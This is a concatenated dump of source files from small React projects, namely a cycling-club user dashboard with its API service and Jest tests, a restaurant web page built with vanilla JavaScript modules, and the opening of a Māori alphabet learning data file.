onCityChange = (event) => {
this.setState({ city: event.target.value });
}
onRideInGroupChange = (event) => {
this.setState({ rideInGroup: event.target.value });
}
// Reset the form state. NOTE(review): <Radio>/<Checkbox> receive only
// onChange (no value/checked props), so they are uncontrolled and will
// NOT visually reset when this runs — confirm intended behaviour.
clearInputs = () => {
this.setState({
name: '',
username: '',
email: '',
city: '',
rideInGroup: '',
daysOfWeek: []
})
}
// Add the day when its checkbox is ticked, remove it when unticked.
onDaysOfWeekChange = (event) => {
let { checked, value } = event.target;
let { daysOfWeek } = this.state;
if (checked === true) {
daysOfWeek = [
...daysOfWeek,
value
]
this.setState({
daysOfWeek
});
} else {
daysOfWeek = daysOfWeek.filter(el => el !== value);
this.setState({ daysOfWeek });
}
}
// NOTE(review): both buttons below share id='btn-salvar' — duplicate DOM
// ids are invalid HTML; confirm nothing relies on it before renaming.
render() {
return (
<div className="register">
<RegisterHeader></RegisterHeader>
<form onSubmit={this.formSubmit}>
<div className="container">
<hr></hr>
<div className="form-row">
<Input id="username" type="username" placeholder="" label="Username" onChange={this.onUsernameChange} value={this.state.username} required={true} />
<Input id="city" type="text" placeholder="" label="City" onChange={this.onCityChange} value={this.state.city} required={true} />
</div>
<div className="form-row">
<Input id="name" type="text" placeholder="" label="Name" onChange={this.onNameChange} value={this.state.name} required={true} />
<Radio onChange={this.onRideInGroupChange}></Radio>
</div>
<div className="form-row">
<Input id="email" type="email" placeholder="" label="E-mail" onChange={this.onEmailChange} value={this.state.email} required={true} />
<Checkbox onChange={this.onDaysOfWeekChange}></Checkbox>
</div>
<div className="form-row btn-register">
<Button id='btn-salvar' text='Save' type="submit" className="btn btn-save"></Button>
<Button id='btn-salvar' text='Discard' type="button" className="btn btn-cancel" onClick={this.clearInputs}></Button>
</div>
</div>
</form>
</div>
)
}
}<file_sep>import React, { Component } from 'react';
// Static stats strip above the user table (sport type / mode / route).
// All values are hard-coded. NOTE(review): the "teste"/"teste2" class
// names look like leftover debug names — confirm against the stylesheet
// before renaming.
export default class DashboardHeader extends Component {
render() {
return (
<div className="row justify-content-start header-dashboard">
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-puzzle-piece icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Sport Type</p>
<h2>Cycling</h2>
</div>
</div>
</div>
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-trophy icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Mode</p>
<h2>Advanced</h2>
</div>
</div>
</div>
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-map-signs icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Route</p>
<h2>30 miles</h2>
</div>
</div>
</div>
</div>
)
}
}<file_sep>import React, { Component } from 'react';
import { BrowserRouter as Router, Link } from "react-router-dom";
// Breadcrumb-style navigation (Dashboard / Register) that also renders
// the routed page content passed in as children.
// NOTE(review): this component creates its own <BrowserRouter> even
// though App.js already wraps it in one — nested routers each own their
// history; confirm whether this inner Router is intentional.
export default class Navigation extends Component {
render() {
return (
<Router>
<nav className="navbar navbar-expand-lg navigation">
<div className="collapse navbar-collapse" id="navbarNav">
<ul className="navbar-nav">
<li className="nav-item icon-default">
<i className="fas fa-home"></i>
</li>
<i className="fas fa-chevron-right"></i>
<li className="nav-item">
<Link to="/user">Dashboard</Link>
</li>
<i className="fas fa-chevron-right"></i>
<li className="nav-item">
<Link to="/user/new">Register</Link>
</li>
</ul>
</div>
</nav>
{this.props.children}
</Router>
)
}
}
<file_sep>import * as endpoint from '../utils/endpoint';
import { extractAsyncData } from '../utils/extract';
import RideInGroupMock from './mocks/rideInGroup'
import DayOfWeekMock from './mocks/dayOfWeek'
class ApiService {
// In-memory cache: filled by the first getUsers() call, mutated by
// saveUser(), returned unchanged afterwards.
users = [];
/**
 * Fetch all users and enrich each one (albums, posts, photos plus the
 * mocked rideInGroup/daysOfWeek attributes). Results are cached.
 * @returns Promise<Array> the enriched user list
 */
getUsers = async () => {
if (this.users.length === 0) {
let users = await extractAsyncData(endpoint.USERS);
// Enrich all users in parallel; Promise.all preserves input order.
// (The original awaited them one at a time.)
this.users = await Promise.all(users.map(user => this._getExtraUserInfo(user)));
}
return this.users;
}
/**
 * @param {Number} userId
 * @returns Promise resolving with the user's albums
 */
getAlbums = (userId) => {
return extractAsyncData(`${endpoint.ALBUMS}?userId=${userId}`);
}
/**
 * @param {Number} albumId
 * @returns Promise resolving with the album's photos
 */
getPhotos = (albumId) => {
return extractAsyncData(`${endpoint.PHOTOS}?albumId=${albumId}`);
}
/**
 * @param {Number} userId
 * @returns Promise resolving with the user's posts
 */
getPosts = (userId) => {
return extractAsyncData(`${endpoint.POSTS}?userId=${userId}`);
}
// Random "ride in group" label (delegates to the mock).
getRandomRideInGroup() {
return RideInGroupMock.random();
}
// Random list of day-of-week labels (delegates to the mock).
getRandomDayOfWeek() {
return DayOfWeekMock.random();
}
getAllRideInGroup() {
return RideInGroupMock.labels;
}
getAllDayOfWeek() {
return DayOfWeekMock.labels;
}
/**
 * Prepend a new (front-end only) user to the cached list.
 * An async function already returns a promise, so the original
 * `new Promise(...)` wrapper (with an unused reject) was unnecessary.
 * @returns Promise<boolean> always resolves true, matching the old contract
 */
async saveUser(name, username, email, city, rideInGroup, daysOfWeek) {
let user = {
name,
username,
email,
address: {
street: '',
suite: '',
city,
zipcode: ''
},
rideInGroup,
daysOfWeek,
photos: [],
albums: [],
posts: []
}
this.users.unshift(user);
return true;
}
/**
 * @param {User} user
 * Enrich one user with posts, albums, photos and the mocked attributes.
 * All photo requests are now awaited: the original fired them inside a
 * forEach without awaiting, so getUsers() could resolve while
 * user.photos was still empty / being filled in.
 */
_getExtraUserInfo = async (user) => {
user.daysOfWeek = this.getRandomDayOfWeek();
user.rideInGroup = this.getRandomRideInGroup();
user.albums = await this.getAlbums(user.id);
user.posts = await this.getPosts(user.id);
const photosPerAlbum = await Promise.all(
user.albums.map(album => this.getPhotos(album.id)));
user.photos = [].concat(...photosPerAlbum);
return user;
}
}
export default new ApiService();<file_sep>export const USERS = "https://jsonplaceholder.typicode.com/users";
// jsonplaceholder REST endpoints consumed by ApiService.
export const PHOTOS = "https://jsonplaceholder.typicode.com/photos";
export const ALBUMS = "https://jsonplaceholder.typicode.com/albums";
export const POSTS = "https://jsonplaceholder.typicode.com/posts";<file_sep>class DaysOfWeekMock {
// Available schedule labels. Entries with multiple:false are exclusive
// summary values ("Every Day" / "Week Days"); multiple:true entries are
// individual days that random() may combine.
labels = [
{
description: 'Every Day',
multiple: false
},
{
description: 'Week Days',
multiple: false
},
{
description: 'Sun',
multiple: true
},
{
description: 'Mon',
multiple: true
},
{
description: 'Tue',
multiple: true
},
{
description: 'Wed',
multiple: true
},
{
description: 'Thu',
multiple: true
},
{
description: 'Fri',
multiple: true
},
{
description: 'Sat',
multiple: true
}
];
/**
* @description Returns a random Day Of Week Label ["Every Day", "Week Days", "Sun", "Mon", "Tue", "Web", "Thu", "Fri"]
* @returns String[]
*/
random() {
let max = Math.floor((Math.random() * 3) + 1);
let labels = [];
for (let i = 0; i < max; i++) {
let options = [];
if (max === 1) {
options = this.labels.filter(el => el.multiple === false);
} else {
options = this.labels.filter(el => el.multiple === true);
}
let item = options[Math.floor(Math.random() * options.length)]
labels.push(item.description);
}
return labels;
}
}
export default new DaysOfWeekMock();<file_sep>import React, { Component } from 'react';
// Static top bar: brand on the left, user dropdown on the right.
// NOTE(review): "<NAME>" below is a redaction placeholder (it is not
// valid JSX as written) — restore the real display name from history or
// make it dynamic. "navabar-icon" also looks like a typo for
// "navbar-icon"; confirm against the stylesheet.
export default class Navbar extends Component {
render() {
return (
<nav className="navbar navbar-light bg-light justify-content-between">
<span className="navbar-brand mb-0 h1 justify-content-end">
<span className="navabar-icon icon-default"><i className="fas fa-question"></i></span>
Venturus Sports
</span>
<form className="form-inline">
<div className="btn-group">
<button type="button" className="btn" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span className="navbar-avatar">JS</span> <NAME> <i className="fas fa-angle-down"></i>
</button>
<div className="dropdown-menu dropdown-menu-right">
<button className="dropdown-item" type="button">Friends List</button>
<button className="dropdown-item" type="button">Saved Items</button>
<button className="dropdown-item" type="button">Notifications</button>
<button className="dropdown-item" type="button">User Preference</button>
<div className="dropdown-divider"></div>
<button className="dropdown-item" type="button">Log out</button>
</div>
</div>
</form>
</nav>
)
}
}
<file_sep>class RideInGroupMock {
// The three possible "ride in group" answers shown in the UI.
labels = ["Always", "Sometimes", "Never"];
/**
* @description Returns a random Ride In Group Label ["Always", "Sometimes", "Never"]
* @returns String
*/
random() {
return this.labels[Math.floor(Math.random() * this.labels.length)];
}
}
export default new RideInGroupMock();<file_sep>import ApiService from './api.service';
// Generous timeout: several tests below hit the live jsonplaceholder API.
jest.setTimeout(40000);
// Every randomly generated day label must come from the declared set.
it('getRandomDayOfWeek', () => {
let allDays = ApiService.getAllDayOfWeek().map(el => { return el.description });
let days = ApiService.getRandomDayOfWeek();
expect(Array.isArray(days)).toBeTruthy()
days.forEach(day => {
expect(typeof day).toBe('string');
expect(allDays.includes(day)).toBeTruthy();
});
});
// A random ride-in-group value must be one of the declared labels.
it('getRandomRideInGroup', () => {
let allRideInGroup = ApiService.getAllRideInGroup();
let rideInGroup = ApiService.getRandomRideInGroup();
expect(typeof rideInGroup).toBe('string');
expect(allRideInGroup.includes(rideInGroup)).toBeTruthy();
});
// The full label lists expose the expected shapes.
it('getAllRideInGroup', () => {
let rideInGroup = ApiService.getAllRideInGroup();
expect(Array.isArray(rideInGroup)).toBeTruthy();
rideInGroup.forEach(el => expect(typeof el).toBe('string'));
});
it('getAllDayOfWeek', () => {
let daysOfWeek = ApiService.getAllDayOfWeek();
expect(Array.isArray(daysOfWeek)).toBeTruthy();
daysOfWeek.forEach(el => {
expect(typeof el.description).toBe('string');
expect(typeof el.multiple).toBe('boolean');
});
});
// Async tests should rely on the returned promise; combining `async`
// with the `done` callback is rejected by modern Jest ("Test functions
// cannot both take a 'done' callback and return something").
it("getUsers", async () => {
let users = await ApiService.getUsers();
expect(Array.isArray(users)).toBeTruthy();
expect(users.length).toBeGreaterThan(0);
let user = users[0];
expect(typeof user).toBe('object');
expect(user.hasOwnProperty('id')).toBeTruthy();
expect(user.hasOwnProperty('name')).toBeTruthy();
expect(user.hasOwnProperty('username')).toBeTruthy();
expect(user.hasOwnProperty('email')).toBeTruthy();
expect(user.hasOwnProperty('address')).toBeTruthy();
expect(user.address.hasOwnProperty('city')).toBeTruthy();
expect(user.hasOwnProperty('posts')).toBeTruthy();
expect(user.hasOwnProperty('albums')).toBeTruthy();
expect(user.hasOwnProperty('photos')).toBeTruthy();
expect(user.hasOwnProperty('daysOfWeek')).toBeTruthy();
expect(user.hasOwnProperty('rideInGroup')).toBeTruthy();
});
it('saveUser', (done) => {
let rideInGroup = ApiService.getRandomRideInGroup();
let daysOfWeek = ApiService.getRandomDayOfWeek();
ApiService.saveUser('User 1', 'user1', '<EMAIL>', 'São Paulo', rideInGroup, daysOfWeek)
.then(data => {
expect(data).toBeTruthy();
// done() must fire after the assertion: the original called it
// synchronously outside the .then(), so the test could finish
// before (or without) the expectation ever running.
done();
})
.catch(done);
});
// Same fix as getUsers: an `async` test must not also take `done`.
it('getAlbums', async () => {
let albums = await ApiService.getAlbums(1);
expect(Array.isArray(albums)).toBeTruthy();
expect(albums.length).toBeGreaterThan(0);
let album = albums[0];
expect(typeof album).toBe('object');
expect(album.hasOwnProperty('id')).toBeTruthy();
expect(album.hasOwnProperty('userId')).toBeTruthy();
expect(album.hasOwnProperty('title')).toBeTruthy();
});
"JavaScript",
"Markdown"
] | 14 | JavaScript | RafaelSSilveira/react-app-sports | 6d1313a589ff1b8d0da1d133fe88e47849408596 | 6d4d37125d3caeb579a7010eb721f63f6367df5e |
refs/heads/master | <repo_name>a6macleod/js_restaurant<file_sep>/src/header.js
const content = document.querySelector("#content");
// Builds the site header (logo + nav bar) and appends it to #content.
// Pure DOM construction; returns nothing.
const header = () => {
  // Build the nav bar with its three page links inside the given header element.
  function createNav(headerEl) {
    const nav = document.createElement("nav");
    nav.id = "navContainer";
    headerEl.appendChild(nav);
    // Nav links — "About" starts highlighted because it is the landing page.
    const about = document.createElement("div");
    about.id = "aboutLink";
    about.classList.add("navBar");
    about.classList.add("selectedPage");
    about.innerHTML = "About";
    const menu = document.createElement("div");
    menu.id = "menuLink";
    menu.classList.add("navBar");
    menu.innerHTML = "Menu";
    const contact = document.createElement("div");
    contact.id = "contactLink";
    contact.classList.add("navBar");
    contact.innerHTML = "Contact";
    nav.appendChild(about);
    nav.appendChild(menu);
    nav.appendChild(contact);
  }
  // FIX: the inner element was previously also named `header`, shadowing this
  // exported function and relying on TDZ timing inside createNav — renamed to
  // headerEl and passed in explicitly.
  const headerEl = document.createElement("header");
  headerEl.classList.add("header");
  content.appendChild(headerEl);
  const logo = document.createElement("h1");
  logo.classList.add("logo");
  logo.innerHTML = "Treat <br> Factory";
  headerEl.appendChild(logo);
  // add menu to header (createNav returns nothing; the old unused
  // `const nav = createNav()` binding was dropped)
  createNav(headerEl);
};
export { header };
<file_sep>/README.md
# js_restaurant
A restaurant page built using only JavaScript.
The general idea is that a restaurant page will be created from JavaScript only. The aim is to practice using multiple JavaScript files, each with its own module, using webpack to combine them, and manipulating the DOM to populate the HTML.
This project was created from [The Odin Project](https://www.theodinproject.com)
<file_sep>/src/contact.js
import { footer } from "./footer.js";
const content = document.querySelector("#content");
// Renders the Contact page (hours, location map, phone number) into #content,
// then appends the shared footer. Returns nothing.
const contact = () => {
  // Helper: create an element, optionally set id / class / innerHTML, and
  // append it to a parent (the original repeated this boilerplate per node).
  const build = (tag, { id, className, html } = {}, parent) => {
    const el = document.createElement(tag);
    if (id) el.id = id;
    if (className) el.classList.add(className);
    if (html !== undefined) el.innerHTML = html;
    if (parent) parent.appendChild(el);
    return el;
  };
  // create the body
  const contactContent = build("div", { id: "contentContainer", className: "contentArea" }, content);
  // Hours
  const hoursContainer = build("div", { id: "hoursContainer", className: "subsectionContainer" }, contactContent);
  build("h2", { className: "sectionTitle", html: "Cafe Hours" }, hoursContainer);
  // NOTE(review): this paragraph uses class "contentSection" while the other
  // text blocks use "contactContent" — kept as-is in case CSS targets it.
  build("p", {
    className: "contentSection",
    html: "Monday - Friday: 7 - 5:30<br><br>Saturday: 7 - 9:00<br><br>Sunday: 11 - 5:30<br>",
  }, hoursContainer);
  // Location
  const locationContainer = build("div", { id: "locationContainer", className: "subsectionContainer" }, contactContent);
  build("h2", { className: "sectionTitle", html: "Our Location" }, locationContainer);
  // Embedded Google Maps iframe for the shop location.
  build("div", {
    id: "locationMap",
    html: '<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m12!1m3!1d1475.8376921761615!2d-83.74492280755015!3d42.28545228672461!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!5e0!3m2!1sen!2sus!4v1571769065815!5m2!1sen!2sus" width="600" height="450" frameborder="0" style="border:0;" allowfullscreen=""></iframe>',
  }, locationContainer);
  build("p", { className: "contactContent", html: "111 Detroit St. Ann Arbor, MI" }, locationContainer);
  // Phone Number
  const phoneContainer = build("div", { id: "phoneContainer", className: "subsectionContainer" }, contactContent);
  build("h2", { className: "sectionTitle", html: "Phone Number" }, phoneContainer);
  // NOTE(review): "734-333-333" has only 9 digits — looks like a typo for a
  // 10-digit number; kept verbatim pending confirmation.
  build("p", { className: "contactContent", html: "734-333-333" }, phoneContainer);
  footer();
};
export { contact };
<file_sep>/src/menu.js
import { footer } from "./footer.js";
const content = document.querySelector("#content");
// Renders the Menu page (coffee, cookies, scones) into #content, then appends
// the shared footer. Returns nothing.
const menu = () => {
  // Helper: create/configure/append an element (removes the repeated
  // createElement / classList.add / appendChild boilerplate).
  const build = (tag, { id, className, html } = {}, parent) => {
    const el = document.createElement(tag);
    if (id) el.id = id;
    if (className) el.classList.add(className);
    if (html !== undefined) el.innerHTML = html;
    if (parent) parent.appendChild(el);
    return el;
  };
  // Helper: a titled menu section with a list of "<name> $<price>" items.
  const buildSection = (id, title, items, parent) => {
    const section = build("div", { id, className: "menuSection" }, parent);
    build("h2", { className: "sectionTitle", html: title }, section);
    items.forEach(item => build("h3", { className: "menuItem", html: item }, section));
    return section;
  };
  // create the body
  const menuContainer = build("div", { id: "contentContainer", className: "contentArea" }, content);
  // Scone and coffee photo by <NAME> on Unsplash
  const sconeImage = document.createElement("img");
  sconeImage.src = "images/jordan-christian-Tl6vDa-JRaE-unsplash.jpg";
  // NOTE(review): "lattee" looks like a typo for "latte" — kept verbatim.
  sconeImage.setAttribute("alt", "A scone and lattee");
  sconeImage.classList.add("backgroundImage");
  menuContainer.appendChild(sconeImage);
  // Menu sections (prices are embedded in the display strings).
  // NOTE(review): "Cappucino" is usually spelled "Cappuccino" — kept verbatim.
  buildSection("coffeeSection", "Coffee", ["Pour Over $3", "Cappucino $4"], menuContainer);
  buildSection("cookieSection", "Cookies", ["Oatmeal Chocolate Walnut $2", "M&M Sugar Cookie $2"], menuContainer);
  buildSection("sconeSection", "Scones", ["Cheese Scone $3", "Orange Scone $3"], menuContainer);
  footer();
};
export { menu };
<file_sep>/src/index.js
import { header } from "./header.js";
import { about } from "./about.js";
import { menu } from "./menu.js";
import { contact } from "./contact.js";
const content = document.querySelector("#content");
let currentTab = "aboutLink";
// Render the page body that matches the currently selected nav tab.
// Unknown tab ids render nothing, exactly as before.
function renderContentSection() {
  const pages = {
    aboutLink: about,
    menuLink: menu,
    contactLink: contact,
  };
  const renderPage = pages[currentTab];
  if (renderPage) {
    renderPage();
  }
}
// Move the "selectedPage" highlight to the clicked nav tab and remember its
// id as the current tab.
function updateHighlightedTab(e) {
  for (const link of pageLinks) {
    link.classList.remove("selectedPage");
  }
  const clickedTab = e.target;
  clickedTab.classList.toggle("selectedPage");
  currentTab = clickedTab.id;
}
// Switch pages: re-highlight the nav and clear the old page content/footer.
// FIX: guards added — the original called .remove() directly on the
// querySelector results, which throws a TypeError when a node is absent.
function changePage(e) {
  // update Nav tab highlight
  updateHighlightedTab(e);
  // clear the content before new rendering
  const contentContainer = document.querySelector("#contentContainer");
  if (contentContainer) {
    contentContainer.remove();
  }
  const footer = document.querySelector("#footer");
  if (footer) {
    footer.remove();
  }
}
// render the first page load
header();
about();
// Nav event listeners
// (the .navBar divs are created by header(), so this query must run after it)
const pageLinks = document.querySelectorAll(".navBar");
pageLinks.forEach(link =>
  link.addEventListener("click", e => {
    changePage(e);
    renderContentSection();
  })
);
| 7989b058efa2083597f7d79c5b96886697463180 | [
"JavaScript",
"Markdown"
] | 5 | JavaScript | a6macleod/js_restaurant | 4092c86c33cbdd653a2e02c5ddc9b96fe4567457 | 1772a06dbc025c2589c904e9bc0c9f5b0c272762 |
refs/heads/master | <file_sep>package com.hexudong.service;
import java.util.List;
import com.hexudong.entity.Book;
/**
 * Service-layer operations for {@link Book} records.
 *
 * Naming follows the Chinese-pinyin scheme used by the Book entity
 * (bid = book id, sjh = phone number, hy = popularity).
 */
public interface BookService {
    /** List books; NOTE(review): "mhname" is presumably a fuzzy ("mohu") name keyword — confirm against the implementation. */
    List<Book> getList(String mhname);
    /** NOTE(review): purpose not evident from here ("SX" is unexplained) — confirm against the implementation. */
    List<Book> getSX();
    /** Fetch a single book by its id (bid). */
    Book getBookBybid(int bid);
    /** NOTE(review): "xg" is presumably "xiugai" (modify): updates a book's sjh (phone) and hy (popularity) by id — confirm. */
    void xg(int bid, String sjh, Integer hy);
}
<file_sep>package com.hexudong.entity;
import javax.validation.constraints.Pattern;
/**
 * Book entity: one library book plus its {@link Type} association.
 * (Field comments translated to English from the original Chinese.)
 */
public class Book {
    private Integer bid;// book id
    private String bname;// book title
    // Bean Validation: must be exactly 11 digits (message "11位数字" means "11 digits").
    @Pattern(regexp="\\d{11}",message="11位数字")
    private String sjh;// phone number
    private String zz;// author
    private int hy;// popularity
    private int tid;// type id
    private String lx;// type alias / short name
    private Type type;// associated type object
    public Integer getBid() {
        return bid;
    }
    public void setBid(Integer bid) {
        this.bid = bid;
    }
    public String getBname() {
        return bname;
    }
    public void setBname(String bname) {
        this.bname = bname;
    }
    public String getSjh() {
        return sjh;
    }
    public void setSjh(String sjh) {
        this.sjh = sjh;
    }
    public String getZz() {
        return zz;
    }
    public void setZz(String zz) {
        this.zz = zz;
    }
    public int getHy() {
        return hy;
    }
    public void setHy(int hy) {
        this.hy = hy;
    }
    public int getTid() {
        return tid;
    }
    public void setTid(int tid) {
        this.tid = tid;
    }
    public String getLx() {
        return lx;
    }
    public void setLx(String lx) {
        this.lx = lx;
    }
    public Type getType() {
        return type;
    }
    public void setType(Type type) {
        this.type = type;
    }
}
| 1e35f17a750c72a92157fee4fc9e95a4ce798d2e | [
"Java"
] | 2 | Java | hexudong666/666 | eef1b039ab52fd22f0459f3509a6e80b56f0b728 | 1ae8ca42a773be6e5f422cdaec4094b99aec4f7b |
refs/heads/master | <file_sep>const React = require ('react')
const { Link } = require ('react-router')
const { connect } = require("react-redux")
class NavLink extends React.Component {
render() {
return (
<Link {...this.props} activeClassName='active'/>
)
}
}
module.exports = connect(state => state)(NavLink)
<file_sep>module.exports = {
letters: [
{
id: 1,
capital: 'A',
lowercase: 'a',
capitalSound: '/sounds/capitalSounds/A.mp3',
lowerSound: '/sounds/lowerSounds/a.mp3',
wordImage: [
{id:1, image:'images/words/ahi.svg', sound: 'sounds/ahi.mp3', description: 'ahi'},
{id:2, image:'images/words/anuhe.svg', sound: 'sounds/anuhe.mp3', description: 'anuhe'},
{id:3, image:'images/words/aroha.svg', sound: 'sounds/aroha.mp3', description: 'aroha'},
],
multimedia: [
'/multimedia/anuhe.webm',
'/multimedia/anuhe.mp4',
'/multimedia/anuhe.ogv',
],
mediaName: 'Anuhe - Caterpillar',
},
{
id: 2,
capital: 'E',
lowercase: 'e',
capitalSound: '/sounds/capitalSounds/E.mp3',
lowerSound: '/sounds/lowerSounds/e.mp3',
wordImage: [
{id:1, image:'images/words/eo.svg', sound: 'sounds/eo.mp3', description: 'eo'},
{id:2, image:'images/words/peke.svg', sound: 'sounds/peke.mp3', description: 'peke'},
{id:3, image:'images/words/kete.svg', sound: 'sounds/kete.mp3', description: 'kete'},
],
multimedia: [
'/multimedia/peke.webm',
'/multimedia/peke.mp4',
'/multimedia/peke.ogv',
],
mediaName: 'Peke - Jump',
},
{
id: 3,
capital: 'I',
lowercase: 'i',
capitalSound: '/sounds/capitalSounds/I.mp3',
lowerSound: '/sounds/lowerSounds/i.mp3',
wordImage: [
{id:1, image:'images/words/ika.svg', sound: 'sounds/ika.mp3', description: 'ika'},
{id:2, image:'images/words/ihu.svg', sound: 'sounds/ihu.mp3', description: 'ihu'},
{id:3, image:'images/words/irirangi.svg', sound: 'sounds/irirangi.mp3', description: 'irirangi'},
],
multimedia: [
'/multimedia/upoko.webm',
'/multimedia/upoko.mp4',
'/multimedia/upoko.ogv',
],
mediaName: 'Ihu - nose',
},
{
id: 4,
capital: 'O',
lowercase: 'o',
capitalSound: '/sounds/capitalSounds/O.mp3',
lowerSound: '/sounds/lowerSounds/o.mp3',
wordImage: [
{id:1, image:'images/words/one.svg', sound: '/sounds/one.mp3', description: 'one'},
{id:2, image:'images/words/ora.svg', sound: '/sounds/oma.mp3', description: 'oma'},
{id:3, image:'images/words/oru.svg', sound: 'sounds/oru.mp3', description: 'oru'},
],
multimedia: [
'/multimedia/oma.webm',
'/multimedia/oma.mp4',
'/multimedia/oma.ogv'
],
mediaName: 'Oma - Run',
},
{
id: 5,
capital: 'U',
lowercase: 'u',
capitalSound: '/sounds/capitalSounds/U.mp3',
lowerSound: '/sounds/lowerSounds/u.mp3',
wordImage: [
{id:1, image:'images/words/upoko.svg', sound: '/sounds/upoko.mp3', description: 'upoko'},
{id:2, image:'images/words/ua.svg', sound: '/sounds/ua.mp3', description: 'ua'},
{id:3, image:'images/words/ururoa.svg', sound: 'sounds/ururoa.mp3', description: 'ururoa'},
],
multimedia: [
'/multimedia/ua.webm',
'/multimedia/ua.mp4',
'/multimedia/ua.ogv',
],
mediaName: 'Ua - Rain',
},
{
id: 6,
capital: 'H',
lowercase: 'h',
capitalSound: '/sounds/capitalSounds/H.mp3',
lowerSound: '/sounds/lowerSounds/h.mp3',
wordImage: [
{id:1, image:'images/words/harakeke.svg', sound: 'sounds/harakeke.mp3', description: 'harakeke'},
{id:2, image:'images/words/hoiho.svg', sound: 'sounds/hoiho.mp3', description: 'hōiho'},
{id:3, image:'images/words/harikoa.svg', sound: 'sounds/harikoa.mp3', description: 'harikoa'},
],
multimedia: [
'/multimedia/hoiho.webm',
'/multimedia/hoiho.mp4',
'/multimedia/hoiho.ogv'
],
mediaName: 'Hōiho - Horse',
},
{
id: 7,
capital: 'K',
lowercase: 'k',
capitalSound: '/sounds/capitalSounds/K.mp3',
lowerSound: '/sounds/lowerSounds/k.mp3',
wordImage: [
{id:1, image:'images/words/kai.svg', sound: '/sounds/kai.mp3', description: 'kai'},
{id:2, image:'images/words/kakariki.svg', sound: '/sounds/kakariki.mp3', description: 'kākāriki'},
{id:3, image:'images/words/koura.svg', sound: 'sounds/koura.mp3', description: 'koura'},
],
multimedia: [
'/multimedia/kakariki.webm',
'/multimedia/kakariki.mp4',
'/multimedia/kakariki.ogv'
],
mediaName: 'Kākāriki - Green',
},
{
id: 8,
capital: 'M',
lowercase: 'm',
capitalSound: '/sounds/capitalSounds/M.mp3',
lowerSound: '/sounds/lowerSounds/m.mp3',
wordImage: [
{id:1, image:'images/words/maunga.svg', sound: '/sounds/maunga.mp3', description: 'maunga'},
{id:2, image:'images/words/manu.svg', sound: '/sounds/manu.mp3', description: 'manu'},
{id:3, image:'images/words/makawe.svg', sound: 'sounds/makawe.mp3', description: 'makawe'},
],
multimedia: [
'/multimedia/manu.webm',
'/multimedia/manu.mp4',
'/multimedia/manu.ogv'
],
mediaName: 'Manu - Bird',
},
{
id: 9,
capital: 'N',
lowercase: 'n',
capitalSound: '/sounds/capitalSounds/N.mp3',
lowerSound: '/sounds/lowerSounds/n.mp3',
wordImage: [
{id:1, image:'images/words/noke.svg', sound: '/sounds/noke.mp3', description: 'noke'},
{id:2, image:'images/words/niho.svg', sound: '/sounds/niho.mp3', description: 'niho'},
{id:3, image:'images/words/nikau.svg', sound: 'sounds/nikau.mp3', description: 'nikau'},
],
multimedia: [ '/multimedia/niho.webm',
'/multimedia/niho.mp4',
'/multimedia/niho.ogv'
],
mediaName: 'Niho - teeth',
},
{
id: 10,
capital: 'Ng',
lowercase: 'ng',
capitalSound: '/sounds/capitalSounds/NG.mp3',
lowerSound: '/sounds/lowerSounds/ng.mp3',
wordImage: [
{id:1, image:'images/words/ngahere.svg', sound: '/sounds/ngahere.mp3', description: 'ngahere'},
{id:2, image:'images/words/ngata.svg', sound: '/sounds/ngata.mp3', description: 'ngata'},
{id:3, image:'images/words/ngutu.svg', sound: 'sounds/ngutu.mp3', description: 'ngutu'},
],
multimedia: [
'/multimedia/ngata.webm',
'/multimedia/ngata.mp4',
'/multimedia/ngata.ogv'
],
mediaName: 'Ngata - Snail',
},
{
id: 11,
capital: 'P',
lowercase: 'p',
capitalSound: '/sounds/capitalSounds/P.mp3',
lowerSound: '/sounds/lowerSounds/p.mp3',
wordImage: [
{id:1, image:'images/words/pungawerewere.svg', sound: '/sounds/pungawerewere.mp3', description: 'pūngāwerewere'},
{id:2, image:'images/words/poi.svg', sound: '/sounds/poi.mp3', description: 'poi'},
{id:3, image:'images/words/paraoa.svg', sound: 'sounds/paraoa.mp3', description: 'paraoa'},
],
multimedia: [
'/multimedia/poi.webm',
'/multimedia/poi.mp4',
'/multimedia/poi.ogv'
],
mediaName: 'Poi - poi',
},
{
id: 12,
capital: 'R',
lowercase: 'r',
capitalSound: '/sounds/capitalSounds/R.mp3',
lowerSound: '/sounds/lowerSounds/r.mp3',
wordImage: [
{id:1, image:'images/words/ruru.svg', sound: '/sounds/ruru.mp3', description: 'ruru'},
{id:2, image:'images/words/ringa.svg', sound: '/sounds/ringa.mp3', description: 'ringa'},
{id:3, image:'images/words/rangi.svg', sound: 'sounds/rangi.mp3', description: 'rangi'},
],
multimedia: [
'/multimedia/ringa.webm',
'/multimedia/ringa.mp4',
'/multimedia/ringa.ogv',
],
mediaName: 'Ringa - Hand',
},
{
id: 13,
capital: 'T',
lowercase: 't',
capitalSound: '/sounds/capitalSounds/T.mp3',
lowerSound: '/sounds/lowerSounds/t.mp3',
wordImage: [
{id:1, image:'images/words/tinana.svg', sound: '/sounds/tinana.mp3', description: 'tinana'},
{id:2, image:'images/words/tohora.svg', sound: '/sounds/tohora.mp3', description: 'tohorā'},
{id:3, image:'images/words/tuatara.svg', sound: 'sounds/tuatara.mp3', description: 'tuatara'},
],
multimedia: [
'/multimedia/tohora.webm',
'/multimedia/tohora.mp4',
'/multimedia/tohora.ogv'
],
mediaName: 'Tohorā - Whale',
},
{
id: 14,
capital: 'W',
lowercase: 'w',
capitalSound: '/sounds/capitalSounds/W.mp3',
lowerSound: '/sounds/lowerSounds/w.mp3',
wordImage: [
{id:1, image:'images/words/waka.svg', sound: '/sounds/waka.mp3', description: 'waka'},
{id:2, image:'images/words/waewae.svg', sound: '/sounds/waewae.mp3', description: 'waewae'},
{id:3, image:'images/words/wai.svg', sound: 'sounds/wai.mp3', description: 'wai'},
],
multimedia: [
'/multimedia/waewae.webm',
'/multimedia/waewae.mp4',
'/multimedia/waewae.ogv'
],
mediaName: 'Waewae - Legs',
},
{
id: 15,
capital: 'Wh',
lowercase: 'wh',
capitalSound: '/sounds/capitalSounds/WH.mp3',
lowerSound: '/sounds/lowerSounds/wh.mp3',
wordImage: [
